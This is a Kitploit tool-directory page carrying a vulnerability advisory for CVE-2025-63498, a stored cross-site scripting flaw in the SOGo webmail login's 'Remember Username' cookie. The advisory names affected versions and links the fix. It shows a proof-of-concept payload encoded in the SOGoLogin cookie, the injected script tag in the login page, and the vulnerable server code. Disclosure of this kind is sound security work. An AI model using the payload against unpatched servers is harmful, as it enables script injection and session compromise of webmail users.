Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-63498 | Kitploit
Tools/GitHubGitHub/xryptoh/cve-2025-63498
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubxryptoh/cve-2025-63498

CVE-2025-63498

View Repository
218 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Stored XSS in cookie Alinto/SOGo

Researchers: Daniil Khomichenok, Alexander Klimenko

Affected Versions < 5.12.4 ( https://github.com/Alinto/sogo/releases/tag/SOGo-5.12.4 )

Date: 01.10.2025


When the "Remember Username" feature is enabled, a base64-encoded field is added to the browser cookie.

This value is obtained from the "userName" parameter in the POST request to the /SOGo/connect endpoint.

Server response contains b64 encoded XSS payload with set cookie:

Set-Cookie: SOGoLogin=dGVzdDIyMkBxYXRlc3Qub2YuYnk8L3NjcmlwdD48c2NyaXB0PmFsZXJ0KCcxMjMnKTwvc2NyaXB0Pg%3D%3D; expires=Sun, 02-Nov-2025 09:58:23 GMT;

Adding the following value to the POST request for the "userName" parameter:

[email protected]

which contains a JavaScript injection that is executed when the user revisits the authentication page and is stored in the "SOGoLogin" cookie in the user's browser.

Code of Auth page, which contains injection:

root@kitploit:~
<script type="text/javascript">
var cookieUsername = "[email protected]</script><script>alert('123')</script>";
var language = 'English';
var loginHint = ''
</script>

Code of login remember set-cookie which accepts XSS injections as a paramteter value:

root@kitploit:~
if (rememberLogin)
  [response addCookie: [self _cookieWithUsername: [params objectForKey: @"userName"]]];
  else
  [response addCookie: [self _cookieWithUsername: nil]];

Fix: https://github.com/Alinto/sogo/commit/9e20190fad1a437f7e1307f0adcfe19a8d45184c

Download Tool